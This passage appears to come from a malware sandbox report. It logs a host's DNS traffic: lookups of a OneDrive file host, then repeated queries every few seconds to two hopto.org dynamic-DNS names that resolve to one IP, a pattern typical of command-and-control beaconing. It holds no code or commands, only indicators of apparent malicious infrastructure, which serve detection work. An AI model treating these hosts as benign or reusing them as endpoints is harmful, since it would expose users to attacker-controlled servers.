Apr 15, 2021 21:38:35.085406065 CEST	51223	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:35.144741058 CEST	53	51223	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:36.452704906 CEST	63908	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:36.509987116 CEST	53	63908	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:38.883800030 CEST	49226	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:38.942790985 CEST	53	49226	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:40.288779974 CEST	60212	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:40.337698936 CEST	53	60212	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:42.617156982 CEST	58867	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:42.667422056 CEST	53	58867	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:43.935611963 CEST	50864	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:43.993396044 CEST	53	50864	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:46.276639938 CEST	61504	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:46.328351974 CEST	53	61504	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:47.609361887 CEST	60231	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:47.660983086 CEST	53	60231	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:49.947123051 CEST	50095	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:50.006330013 CEST	53	50095	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:51.309214115 CEST	59654	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:51.367562056 CEST	53	59654	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:53.654618025 CEST	58233	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:53.713327885 CEST	53	58233	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:55.002692938 CEST	56822	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:55.060154915 CEST	53	56822	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:57.364814997 CEST	62572	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:57.420237064 CEST	53	62572	8.8.8.8	192.168.2.7
Apr 15, 2021 21:38:58.721203089 CEST	57179	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:59.710292101 CEST	57179	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:38:59.772655010 CEST	53	57179	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:02.055828094 CEST	56124	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:02.116065025 CEST	53	56124	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:03.420850039 CEST	62287	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:03.469728947 CEST	53	62287	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:04.451302052 CEST	54644	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:04.500186920 CEST	53	54644	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:05.760915995 CEST	59159	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:05.818090916 CEST	53	59159	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:07.113179922 CEST	57924	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:07.170516968 CEST	53	57924	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:08.245248079 CEST	51712	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:08.305916071 CEST	53	51712	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:09.463030100 CEST	58865	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:09.512432098 CEST	53	58865	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:10.786021948 CEST	64337	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:10.844202042 CEST	53	64337	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:13.140233040 CEST	50407	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:13.189012051 CEST	53	50407	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:14.469330072 CEST	61075	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:14.526352882 CEST	53	61075	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:16.916650057 CEST	54952	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:16.980429888 CEST	53	54952	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:18.251857042 CEST	59186	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:18.312412977 CEST	53	59186	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:20.590785980 CEST	52280	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:20.650733948 CEST	53	52280	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:21.949884892 CEST	51794	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:22.009567022 CEST	53	51794	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:24.292645931 CEST	50815	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:24.358584881 CEST	53	50815	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:24.644330978 CEST	58498	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:24.696161032 CEST	53	58498	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:25.542690992 CEST	56862	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:25.602709055 CEST	53	56862	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:25.656965971 CEST	61807	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:25.716300964 CEST	53	61807	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:26.318164110 CEST	52009	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:26.375566959 CEST	53	52009	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:26.387872934 CEST	58648	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:26.455368042 CEST	53	58648	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:26.870881081 CEST	59337	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:26.988657951 CEST	53	59337	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:27.811736107 CEST	59269	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:27.871707916 CEST	53	59269	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:28.170053959 CEST	49802	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:28.230061054 CEST	53	49802	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:28.934828043 CEST	50706	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:29.039972067 CEST	53	50706	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:29.503515005 CEST	55153	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:29.565331936 CEST	53	55153	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:29.623873949 CEST	59744	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:29.681648970 CEST	53	59744	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:30.935522079 CEST	59987	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:30.984512091 CEST	53	59987	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:31.859147072 CEST	61272	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:31.922386885 CEST	53	61272	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:31.924108028 CEST	54352	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:31.984180927 CEST	53	54352	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:32.517014980 CEST	60696	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:32.625258923 CEST	53	60696	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:33.209800005 CEST	59139	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:33.271392107 CEST	53	59139	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:35.556883097 CEST	59565	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:35.614804029 CEST	53	59565	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:36.892472029 CEST	56397	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:36.951955080 CEST	53	56397	8.8.8.8	192.168.2.7
Apr 15, 2021 21:39:39.229773998 CEST	52818	53	192.168.2.7	8.8.8.8
Apr 15, 2021 21:39:39.291035891 CEST	53	52818	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 15, 2021 21:37:48.802593946 CEST	192.168.2.7	8.8.8.8	0x46d8	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:49.960247040 CEST	192.168.2.7	8.8.8.8	0x775d	Standard query (0)	vug8la.am.files.1drv.com	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:50.591296911 CEST	192.168.2.7	8.8.8.8	0x531e	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:52.027503014 CEST	192.168.2.7	8.8.8.8	0x6687	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:54.396652937 CEST	192.168.2.7	8.8.8.8	0x77b7	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:55.883899927 CEST	192.168.2.7	8.8.8.8	0xefcd	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:58.407825947 CEST	192.168.2.7	8.8.8.8	0xcd0e	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:59.886395931 CEST	192.168.2.7	8.8.8.8	0xebc3	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:02.496493101 CEST	192.168.2.7	8.8.8.8	0x71af	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:05.063811064 CEST	192.168.2.7	8.8.8.8	0x1ad9	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:07.598874092 CEST	192.168.2.7	8.8.8.8	0x6e9f	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:09.121296883 CEST	192.168.2.7	8.8.8.8	0xf87f	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:11.537194014 CEST	192.168.2.7	8.8.8.8	0x1eaa	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:12.891961098 CEST	192.168.2.7	8.8.8.8	0xa7cf	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:15.411658049 CEST	192.168.2.7	8.8.8.8	0x4e0d	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:16.885463953 CEST	192.168.2.7	8.8.8.8	0x3a5a	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:17.518254995 CEST	192.168.2.7	8.8.8.8	0x263a	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:18.573218107 CEST	192.168.2.7	8.8.8.8	0x7d41	Standard query (0)	vug8la.am.files.1drv.com	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:19.239909887 CEST	192.168.2.7	8.8.8.8	0x635c	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:20.951914072 CEST	192.168.2.7	8.8.8.8	0x2da5	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:23.464535952 CEST	192.168.2.7	8.8.8.8	0xd9a0	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:24.889895916 CEST	192.168.2.7	8.8.8.8	0xe9a0	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:27.407407999 CEST	192.168.2.7	8.8.8.8	0x21ec	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:28.856319904 CEST	192.168.2.7	8.8.8.8	0xac6b	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:31.242928028 CEST	192.168.2.7	8.8.8.8	0xbbde	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:32.736114979 CEST	192.168.2.7	8.8.8.8	0x1485	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:35.085406065 CEST	192.168.2.7	8.8.8.8	0x8533	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:36.452704906 CEST	192.168.2.7	8.8.8.8	0x62a9	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:38.883800030 CEST	192.168.2.7	8.8.8.8	0xac9d	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:40.288779974 CEST	192.168.2.7	8.8.8.8	0x2a00	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:42.617156982 CEST	192.168.2.7	8.8.8.8	0xf1f	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:43.935611963 CEST	192.168.2.7	8.8.8.8	0x8ff1	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:46.276639938 CEST	192.168.2.7	8.8.8.8	0x8eba	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:47.609361887 CEST	192.168.2.7	8.8.8.8	0x63b2	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:49.947123051 CEST	192.168.2.7	8.8.8.8	0xefaf	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:51.309214115 CEST	192.168.2.7	8.8.8.8	0xc01c	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:53.654618025 CEST	192.168.2.7	8.8.8.8	0x54a5	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:55.002692938 CEST	192.168.2.7	8.8.8.8	0xe904	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:57.364814997 CEST	192.168.2.7	8.8.8.8	0x7315	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:58.721203089 CEST	192.168.2.7	8.8.8.8	0x24ab	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:59.710292101 CEST	192.168.2.7	8.8.8.8	0x24ab	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:02.055828094 CEST	192.168.2.7	8.8.8.8	0x7441	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:03.420850039 CEST	192.168.2.7	8.8.8.8	0x5bf	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:05.760915995 CEST	192.168.2.7	8.8.8.8	0x4f8f	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:07.113179922 CEST	192.168.2.7	8.8.8.8	0x2030	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:09.463030100 CEST	192.168.2.7	8.8.8.8	0x7ec7	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:10.786021948 CEST	192.168.2.7	8.8.8.8	0x3a2c	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:13.140233040 CEST	192.168.2.7	8.8.8.8	0xfb12	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:14.469330072 CEST	192.168.2.7	8.8.8.8	0x1bf5	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:16.916650057 CEST	192.168.2.7	8.8.8.8	0x95d4	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:18.251857042 CEST	192.168.2.7	8.8.8.8	0xe70b	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:20.590785980 CEST	192.168.2.7	8.8.8.8	0x480b	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:21.949884892 CEST	192.168.2.7	8.8.8.8	0xf35f	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:24.292645931 CEST	192.168.2.7	8.8.8.8	0x10c4	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:25.656965971 CEST	192.168.2.7	8.8.8.8	0x1111	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:28.170053959 CEST	192.168.2.7	8.8.8.8	0xa942	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:29.503515005 CEST	192.168.2.7	8.8.8.8	0x96b3	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:31.859147072 CEST	192.168.2.7	8.8.8.8	0xe0c1	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:33.209800005 CEST	192.168.2.7	8.8.8.8	0x3d8e	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:35.556883097 CEST	192.168.2.7	8.8.8.8	0x91ca	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:36.892472029 CEST	192.168.2.7	8.8.8.8	0xc874	Standard query (0)	micheal3m.hopto.org	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:39.229773998 CEST	192.168.2.7	8.8.8.8	0xdf46	Standard query (0)	sheilabeltagy4m.hopto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 15, 2021 21:37:48.893234015 CEST	8.8.8.8	192.168.2.7	0x46d8	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:37:50.058324099 CEST	8.8.8.8	192.168.2.7	0x775d	No error (0)	vug8la.am.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:37:50.058324099 CEST	8.8.8.8	192.168.2.7	0x775d	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:37:50.657018900 CEST	8.8.8.8	192.168.2.7	0x531e	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:52.090646982 CEST	8.8.8.8	192.168.2.7	0x6687	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:54.445342064 CEST	8.8.8.8	192.168.2.7	0x77b7	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:55.945579052 CEST	8.8.8.8	192.168.2.7	0xefcd	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:58.464782953 CEST	8.8.8.8	192.168.2.7	0xcd0e	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:37:59.943789959 CEST	8.8.8.8	192.168.2.7	0xebc3	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:02.556653976 CEST	8.8.8.8	192.168.2.7	0x71af	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:05.121182919 CEST	8.8.8.8	192.168.2.7	0x1ad9	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:07.660828114 CEST	8.8.8.8	192.168.2.7	0x6e9f	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:09.182832956 CEST	8.8.8.8	192.168.2.7	0xf87f	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:11.599572897 CEST	8.8.8.8	192.168.2.7	0x1eaa	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:12.952260017 CEST	8.8.8.8	192.168.2.7	0xa7cf	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:15.475481033 CEST	8.8.8.8	192.168.2.7	0x4e0d	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:16.945600033 CEST	8.8.8.8	192.168.2.7	0x3a5a	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:17.575056076 CEST	8.8.8.8	192.168.2.7	0x263a	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:38:18.703882933 CEST	8.8.8.8	192.168.2.7	0x7d41	No error (0)	vug8la.am.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:38:18.703882933 CEST	8.8.8.8	192.168.2.7	0x7d41	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 21:38:19.297369003 CEST	8.8.8.8	192.168.2.7	0x635c	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:21.009164095 CEST	8.8.8.8	192.168.2.7	0x2da5	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:23.526545048 CEST	8.8.8.8	192.168.2.7	0xd9a0	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:24.946687937 CEST	8.8.8.8	192.168.2.7	0xe9a0	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:27.467569113 CEST	8.8.8.8	192.168.2.7	0x21ec	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:28.916944027 CEST	8.8.8.8	192.168.2.7	0xac6b	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:31.302731037 CEST	8.8.8.8	192.168.2.7	0xbbde	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:32.793426991 CEST	8.8.8.8	192.168.2.7	0x1485	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:35.144741058 CEST	8.8.8.8	192.168.2.7	0x8533	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:36.509987116 CEST	8.8.8.8	192.168.2.7	0x62a9	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:38.942790985 CEST	8.8.8.8	192.168.2.7	0xac9d	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:40.337698936 CEST	8.8.8.8	192.168.2.7	0x2a00	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:42.667422056 CEST	8.8.8.8	192.168.2.7	0xf1f	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:43.993396044 CEST	8.8.8.8	192.168.2.7	0x8ff1	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:46.328351974 CEST	8.8.8.8	192.168.2.7	0x8eba	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:47.660983086 CEST	8.8.8.8	192.168.2.7	0x63b2	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:50.006330013 CEST	8.8.8.8	192.168.2.7	0xefaf	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:51.367562056 CEST	8.8.8.8	192.168.2.7	0xc01c	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:53.713327885 CEST	8.8.8.8	192.168.2.7	0x54a5	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:55.060154915 CEST	8.8.8.8	192.168.2.7	0xe904	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:57.420237064 CEST	8.8.8.8	192.168.2.7	0x7315	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:38:59.772655010 CEST	8.8.8.8	192.168.2.7	0x24ab	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:02.116065025 CEST	8.8.8.8	192.168.2.7	0x7441	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:03.469728947 CEST	8.8.8.8	192.168.2.7	0x5bf	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:05.818090916 CEST	8.8.8.8	192.168.2.7	0x4f8f	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:07.170516968 CEST	8.8.8.8	192.168.2.7	0x2030	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:09.512432098 CEST	8.8.8.8	192.168.2.7	0x7ec7	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:10.844202042 CEST	8.8.8.8	192.168.2.7	0x3a2c	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:13.189012051 CEST	8.8.8.8	192.168.2.7	0xfb12	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:14.526352882 CEST	8.8.8.8	192.168.2.7	0x1bf5	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:16.980429888 CEST	8.8.8.8	192.168.2.7	0x95d4	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:18.312412977 CEST	8.8.8.8	192.168.2.7	0xe70b	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:20.650733948 CEST	8.8.8.8	192.168.2.7	0x480b	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:22.009567022 CEST	8.8.8.8	192.168.2.7	0xf35f	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:24.358584881 CEST	8.8.8.8	192.168.2.7	0x10c4	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:25.716300964 CEST	8.8.8.8	192.168.2.7	0x1111	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:28.230061054 CEST	8.8.8.8	192.168.2.7	0xa942	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
